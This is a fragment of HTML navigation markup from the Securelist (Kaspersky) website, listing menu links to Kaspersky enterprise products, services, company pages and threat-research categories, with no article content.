class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87724"><a href="https://www.kaspersky.com/enterprise-security/telecom?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Telecom Cybersecurity</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87725"><a href="https://www.kaspersky.com/enterprise-security/industries?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">View all</a> </ul> </ul> <li class="dropdown mega menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-87726"><a href="https://www.kaspersky.com/enterprise-security/products?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Products</a> <ul class="submenu"> <li class="first featured featured-smaller menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-87728"> <ul class="featured section-col-l-3 no-gutter"> <li class="show-figure smaller-item menu-item menu-item-type-custom menu-item-object-custom menu-item-112352"><a href="https://www.kaspersky.com/next?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><figure><img alt="" src="https://media.kasperskydaily.com/wp-content/uploads/sites/92/2024/04/10052437/k_Next_RGB_black_icon.png"></figure>Kaspersky Next <small class="label-inline red">NEW!</small></a><div class="desc"><p><a href="https://www.kaspersky.com/next?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item menu-item menu-item-type-custom menu-item-object-custom menu-item-112323"><a href="https://www.kaspersky.com/enterprise-security/xdr?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><span class="surtitle">Kaspersky</span>XDR</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/xdr?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item icon-endpoint-security_products menu-item menu-item-type-custom menu-item-object-custom menu-item-87727"><figure><a href="https://www.kaspersky.com/enterprise-security/endpoint?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/enterprise-menu-icons/endpoint-security_products.png"</a></figure><a href="https://www.kaspersky.com/enterprise-security/endpoint?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><span class="surtitle">Kaspersky</span>Endpoint Security for Business</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/endpoint?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item icon-endpoint-detection-and-response menu-item menu-item-type-custom menu-item-object-custom menu-item-112324"><figure><a href="https://www.kaspersky.com/enterprise-security/endpoint-detection-response-edr?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/enterprise-menu-icons/endpoint-detection-and-response.png"</a></figure><a href="https://www.kaspersky.com/enterprise-security/endpoint-detection-response-edr?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><span class="surtitle">Kaspersky</span>EDR Expert</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/endpoint-detection-response-edr?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item icon-hybrid-cloud-security_products menu-item menu-item-type-custom menu-item-object-custom menu-item-87730"><figure><a href="https://www.kaspersky.com/enterprise-security/edr-security-software-solution?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/enterprise-menu-icons/hybrid-cloud-security_products.png"</a></figure><a href="https://www.kaspersky.com/enterprise-security/edr-security-software-solution?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><span class="surtitle">Kaspersky</span>EDR Optimum</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/edr-security-software-solution?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item icon-anti-targeted-attack-platform menu-item menu-item-type-custom menu-item-object-custom menu-item-87731"><figure><a href="https://www.kaspersky.com/enterprise-security/anti-targeted-attack-platform?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/enterprise-menu-icons/anti-targeted-attack-platform.png"</a></figure><a href="https://www.kaspersky.com/enterprise-security/anti-targeted-attack-platform?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><span class="surtitle">Kaspersky</span>Anti Targeted Attack Platform</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/anti-targeted-attack-platform?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item menu-item menu-item-type-custom menu-item-object-custom menu-item-112325"><a href="https://www.kaspersky.com/enterprise-security/cloud-security?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><span class="surtitle">Kaspersky</span>Hybrid Cloud Security</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/cloud-security?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item menu-item menu-item-type-custom menu-item-object-custom menu-item-112326"><a href="https://www.kaspersky.com/enterprise-security/sd-wan?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><span class="surtitle">Kaspersky</span>SD-WAN</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/sd-wan?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item icon-private-security-network menu-item menu-item-type-custom menu-item-object-custom menu-item-87732"><figure><a href="https://www.kaspersky.com/enterprise-security/industrial-cybersecurity?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/enterprise-menu-icons/private-security-network.png"</a></figure><a href="https://www.kaspersky.com/enterprise-security/industrial-cybersecurity?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><span class="surtitle">Kaspersky</span>Industrial CyberSecurity</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/industrial-cybersecurity?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item icon-embedded-systems-security menu-item menu-item-type-custom menu-item-object-custom menu-item-87733"><figure><a href="https://www.kaspersky.com/enterprise-security/container-security?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/enterprise-menu-icons/embedded-systems-security.png"</a></figure><a href="https://www.kaspersky.com/enterprise-security/container-security?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><span class="surtitle">Kaspersky</span>Container Security</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/container-security?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> </ul> <li> <ul class="regular"> <li class="title"><h6>Other Products</h6> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-112328"><a href="https://www.kaspersky.com/enterprise-security/products/internet-gateway?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Kaspersky Security for Internet Gateway</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-112329"><a href="https://www.kaspersky.com/enterprise-security/embedded-systems?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Kaspersky Embedded Systems Security</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-112330"><a href="https://www.kaspersky.com/enterprise-security/kaspersky-iot-infrastructure-security?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Kaspersky IoT Infrastructure Security</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-112331"><a href="https://www.kaspersky.com/enterprise-security/kaspersky-secure-remote-workspace?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Kaspersky Secure Remote Workspace</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-112332"><a href="https://www.kaspersky.com/enterprise-security/mail-server-security?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Kaspersky Security for Mail Server</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87740"><a target="_blank" href="https://www.kaspersky.com/enterprise-security/products?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">View All</a> </ul> </ul> <li class="dropdown mega menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-87741"><a href="https://www.kaspersky.com/enterprise-security/services?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Services</a> <ul class="submenu"> <li class="first featured featured-smaller menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-87742"> <ul class="featured section-col-l-3 no-gutter"> <li class="show-figure smaller-item icon-cybersecurity-services menu-item menu-item-type-custom menu-item-object-custom menu-item-87743"><figure><a href="https://www.kaspersky.com/enterprise-security/cybersecurity-services?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/enterprise-menu-icons/cybersecurity-services.png"</a></figure><a href="https://www.kaspersky.com/enterprise-security/cybersecurity-services?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><span class="surtitle">Kaspersky</span>Cybersecurity Services</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/cybersecurity-services?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item menu-item menu-item-type-custom menu-item-object-custom menu-item-105619"><a href="https://www.kaspersky.com/enterprise-security/security-awareness?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><span class="surtitle">Kaspersky</span>Security Awareness</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/security-awareness?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item icon-premium-support menu-item menu-item-type-custom menu-item-object-custom menu-item-87745"><figure><a href="https://www.kaspersky.com/enterprise-security/premium-support?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/enterprise-menu-icons/premium-support.png"</a></figure><a href="https://www.kaspersky.com/enterprise-security/premium-support?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><span class="surtitle">Kaspersky</span>Premium Support</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/premium-support?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item icon-threat-intelligence menu-item menu-item-type-custom menu-item-object-custom menu-item-87746"><figure><a href="https://www.kaspersky.com/enterprise-security/threat-intelligence?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/enterprise-menu-icons/threat-intelligence.png"</a></figure><a href="https://www.kaspersky.com/enterprise-security/threat-intelligence?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><span class="surtitle">Kaspersky</span>Threat Intelligence</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/threat-intelligence?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item icon-incident-response menu-item menu-item-type-custom menu-item-object-custom menu-item-87748"><figure><a href="https://www.kaspersky.com/enterprise-security/managed-detection-and-response?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/enterprise-menu-icons/incident-response.png"</a></figure><a href="https://www.kaspersky.com/enterprise-security/managed-detection-and-response?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><span class="surtitle">Kaspersky</span>Managed Detection and Response</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/managed-detection-and-response?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item icon-threat-hunting menu-item menu-item-type-custom menu-item-object-custom menu-item-87747"><figure><a href="https://www.kaspersky.com/enterprise-security/compromise-assessment?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/enterprise-menu-icons/threat-hunting.png"</a></figure><a href="https://www.kaspersky.com/enterprise-security/compromise-assessment?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><span class="surtitle">Kaspersky</span>Compromise Assessment</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/compromise-assessment?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item icon-threat-hunting menu-item menu-item-type-custom menu-item-object-custom menu-item-112333"><figure><a href="https://www.kaspersky.com/enterprise-security/soc-consulting?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/enterprise-menu-icons/threat-hunting.png"</a></figure><a href="https://www.kaspersky.com/enterprise-security/soc-consulting?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><span class="surtitle">Kaspersky</span>SOC Consulting</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/soc-consulting?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> </ul> <li> <ul class="regular"> <li class="title"><h6>Other Services</h6> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87751"><a href="https://www.kaspersky.com/enterprise-security/professional-services?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Kaspersky Professional Services</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87752"><a href="https://www.kaspersky.com/enterprise-security/incident-response?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Kaspersky Incident Response</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87753"><a href="https://www.kaspersky.com/enterprise-security/cyber-security-training?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Kaspersky Cybersecurity Training</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87755"><a href="https://www.kaspersky.com/enterprise-security/services?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">View All</a> </ul> </ul> <li class="dropdown menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-87756"><a href="https://www.kaspersky.com/enterprise-security/resources?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Resource Center</a> <ul class="submenu"> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87757"><a href="https://www.kaspersky.com/enterprise-security/resources/case-studies?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Case Studies</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87758"><a href="https://www.kaspersky.com/enterprise-security/resources/white-papers?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">White Papers</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87759"><a href="https://www.kaspersky.com/enterprise-security/resources/data-sheets?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Datasheets</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87760"><a href="https://www.kaspersky.com/enterprise-security/wiki-section/home?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Technologies</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105620"><a href="https://www.kaspersky.com/MITRE?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">MITRE ATT&CK</a> </ul> <li class="dropdown menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-87761"><a href="https://www.kaspersky.com/about?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">About Us</a> <ul class="submenu"> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105621"><a href="https://www.kaspersky.com/about/transparency?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Transparency</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105622"><a href="https://www.kaspersky.com/about/press-releases?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Corporate News</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105623"><a href="https://press.kaspersky.com/?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Press Center</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105624"><a href="https://www.kaspersky.com/about/careers?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Careers</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105626"><a href="https://www.kaspersky.com/about/sponsorships/?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Sponsorship</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105627"><a href="https://www.kaspersky.com/about/policy-blog?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Policy Blog</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105628"><a href="https://www.kaspersky.com/about/contact?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Contacts</a> </ul> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87762"><a href="https://www.kaspersky.com/gdpr?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">GDPR</a> </ul> </nav> </div> </header> <div class="mobile-menu-wrapper mobile-menu-wrapper--dark"> <ul class="mobile-nav" data-back="Back"> <li class="selector"> <a data-element-id="subscribe-button" href="#modal-newsletter" class="button-link js-modal-open"><i class="font-icons icon-envelope"></i>Subscribe</a> <a href="#" class="button-link c-theme-switcher js-theme-switcher"><i class="font-icons icon-moon"></i> Dark mode<span class="u-hidden u-inline--dark"> off</span></a> <a data-element-id="login-button" href="#" class="button-link js-kaspersky-sso-login"><svg class="o-icon o-svg-icon"><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="https://securelist.com/wp-content/themes/securelist2020/assets/sprite/icons.svg#icon-user"></use></svg>Login</a> </li> <li class="title"> <span>Securelist menu</span> </li> <li class="parent" data-parent data-icon="top-item"><a data-element-id="lang-selector" href="#" class=""><i class="top-item"></i><span>English</span></a><ul class="submenu"><li class="menu-item"><a href="https://securelist.ru">Russian</a></li><li class="menu-item"><a href="https://securelist.lat">Spanish</a></li></ul> <li class="parent" data-parent="Existing Customers" data-icon="font-icons top-item"><a rel="Existing Customers" href="#"><i class="font-icons top-item"></i><span>Existing Customers</span></a> <ul class="submenu"> <li class="parent" data-parent="Personal" data-icon="top-item"><a rel="Personal" href="#"><i class="top-item"></i><span>Personal</span></a> <ul class="submenu"> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87860"><a href="https://my.kaspersky.com/?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">My Kaspersky</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105987"><a href="https://www.kaspersky.com/renewal-center/home?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Renew your product</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105988"><a href="https://www.kaspersky.com/downloads?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Update your product</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105989"><a href="https://support.kaspersky.com/?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Customer support</a> </ul> <li class="parent" data-parent="Business" data-icon="top-item"><a rel="Business" href="#"><i class="top-item"></i><span>Business</span></a> <ul class="submenu"> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105991"><a href="https://ksos.kaspersky.com/?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">KSOS portal</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105992"><a href="https://cloud.kaspersky.com/?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Kaspersky Business Hub</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105993"><a href="https://support.kaspersky.com/?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Technical Support</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105994"><a href="https://www.kaspersky.com/small-to-medium-business-security/resources?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Knowledge Base</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105995"><a href="https://www.kaspersky.com/renewal-center/vsb?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Renew License</a> </ul> </ul> <li class="parent" data-parent="Home" data-icon="font-icons top-item"><a rel="Home" href="#"><i class="font-icons top-item"></i><span>Home</span></a> <ul class="submenu"> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87778"><a href="https://www.kaspersky.com/home-security?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Products</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87771"><a href="https://www.kaspersky.com/downloads?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Trials&Update</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87859"><a href="https://www.kaspersky.com/resource-center?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Resource Center</a> </ul> <li class="parent" data-parent="Business" data-icon="top-item"><a rel="Business" href="#"><i class="top-item"></i><span>Business</span></a> <ul class="submenu"> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-112353"><a href="https://www.kaspersky.com/next?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Kaspersky Next</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87776"><a href="https://www.kaspersky.com/small-business-security?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Small Business (1-50 employees)</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87782"><a href="https://www.kaspersky.com/small-to-medium-business-security?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Medium Business (51-999 employees)</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87783"><a href="https://www.kaspersky.com/enterprise-security?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Enterprise (1000+ employees)</a> </ul> <li class="splitter"></li> <li class="title"><span>Securelist</span> <li class="parent" data-parent="" data-icon="top-item"><a href="https://securelist.com/threat-categories/"><i class="top-item"></i><span>Threats</span></a> <ul class="submenu"> <li class="menu-item menu-item-type-taxonomy menu-item-object-threat-category menu-item-89472"><a href="https://securelist.com/threat-category/financial-threats/">Financial threats</a> <li class="menu-item menu-item-type-taxonomy menu-item-object-threat-category menu-item-89467"><a href="https://securelist.com/threat-category/mobile-threats/">Mobile threats</a> <li class="menu-item menu-item-type-taxonomy menu-item-object-threat-category menu-item-89471"><a href="https://securelist.com/threat-category/web-threats/">Web threats</a> <li class="menu-item menu-item-type-taxonomy menu-item-object-threat-category menu-item-89468"><a href="https://securelist.com/threat-category/secure-environment/">Secure environment (IoT)</a> <li class="menu-item menu-item-type-taxonomy menu-item-object-threat-category menu-item-89470"><a href="https://securelist.com/threat-category/vulnerabilities-and-exploits/">Vulnerabilities and exploits</a> <li class="menu-item menu-item-type-taxonomy menu-item-object-threat-category menu-item-89466"><a href="https://securelist.com/threat-category/spam-and-phishing/">Spam and Phishing</a> <li class="menu-item menu-item-type-taxonomy menu-item-object-threat-category menu-item-89469"><a href="https://securelist.com/threat-category/industrial-threats/">Industrial threats</a> </ul> <li class="parent" data-parent="" data-icon="top-item"><a href="https://securelist.com/categories/"><i class="top-item"></i><span>Categories</span></a> <ul class="submenu"> <li class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-87880"><a href="https://securelist.com/category/apt-reports/">APT reports</a> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-87881"><a href="https://securelist.com/category/incidents/">Incidents</a> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-87886"><a href="https://securelist.com/category/research/">Research</a> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-89476"><a href="https://securelist.com/category/malware-reports/">Malware reports</a> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-89479"><a href="https://securelist.com/category/spam-and-phishing-reports/">Spam and phishing reports</a> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-89477"><a href="https://securelist.com/category/publications/">Publications</a> <li class="menu-item 